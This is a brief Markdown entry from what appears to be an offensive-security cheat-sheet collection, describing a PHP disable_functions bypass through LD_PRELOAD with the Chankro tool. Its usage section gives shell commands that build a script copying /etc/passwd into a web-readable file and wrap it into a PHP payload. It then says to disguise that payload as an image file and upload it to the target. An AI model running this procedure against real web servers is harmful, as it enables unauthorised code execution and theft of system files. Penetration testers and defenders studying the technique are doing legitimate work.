killchain-compendium/Exploits/Web/PHP Preload Libs.md

16 lines
449 B
Markdown
Raw Normal View History

2022-11-13 22:52:30 +01:00
# Preload Library
* [Bug report](https://bugs.php.net/bug.php?id=46741)
* [Chankro repo](https://github.com/TarlogicSecurity/Chankro.git)
## Usage
* Create lib, find path via `<URL>/phpinfo.php`
```sh
echo "#!/usr/bin/env bash" > rev.sh
echo "cat /etc/passwd > <basepath>/output.txt" >> rev.sh
python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path <basepath>
```
* Put into image file via exiftool or write magic header
* Upload